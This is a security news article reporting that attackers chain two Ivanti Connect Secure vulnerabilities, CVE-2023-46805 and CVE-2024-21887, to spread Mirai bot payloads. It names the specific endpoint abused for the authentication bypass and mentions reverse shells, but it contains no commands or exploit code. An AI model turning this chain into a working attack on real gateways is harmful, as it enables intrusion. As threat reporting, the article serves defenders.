Mirai Botnet Exploits Ivanti Connect Secure Vulnerabilities

May 9, 2024

Juniper Threat Labs has reported that unidentified threat actors are exploiting recently exposed vulnerabilities in Ivanti Connect Secure (ICS) to distribute the payload of the Mirai botnet. Ivanti, a software company, had earlier disclosed that two zero-day vulnerabilities (CVE-2023-46805, CVE-2024-21887) in Connect Secure (ICS) and Policy Secure were being exploited by threat actors to carry out remote execution of arbitrary commands on targeted gateways.

The first vulnerability, CVE-2023-46805, with a CVSS score of 8.2, is an Authentication Bypass issue that is present in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure. This vulnerability can be triggered by a remote attacker to access restricted resources by bypassing control checks.

The second flaw, CVE-2024-21887, with a CVSS score of 9.1, is a command injection vulnerability in the web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure. An authenticated administrator can exploit this vulnerability by sending specially crafted requests to execute arbitrary commands on the appliance.

Ivanti's advisory states, “If CVE-2024-21887 is used in conjunction with CVE-2023-46805, exploitation does not require authentication and enables a threat actor to craft malicious requests and execute arbitrary commands on the system.”

Juniper Threat Labs researchers have observed threat actors exploiting the CVE-2023-46805 vulnerability to gain access to the end point “/api/v1/license/key-status/;” They then exploit the command injection issue to inject their payload.

The researchers have noted instances where attackers have exploited this vulnerability using both curl and Python-based reverse shells, enabling them to take control of vulnerable systems. They have also encountered Mirai payloads delivered through shell scripts.

The researchers analyzed the payloads and identified them as Mirai bots. They warn that the increasing attempts to exploit Ivanti Pulse Secure’s authentication bypass and remote code execution vulnerabilities represent a significant threat to network security. The discovery of Mirai botnet delivery through these exploits highlights the constantly changing landscape of cyber threats. The fact that Mirai was delivered through this vulnerability also indicates that the deployment of other harmful malware and ransomware can be expected. Understanding how these vulnerabilities can be exploited and recognizing the specific threats they pose is crucial for protection against potential risks.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.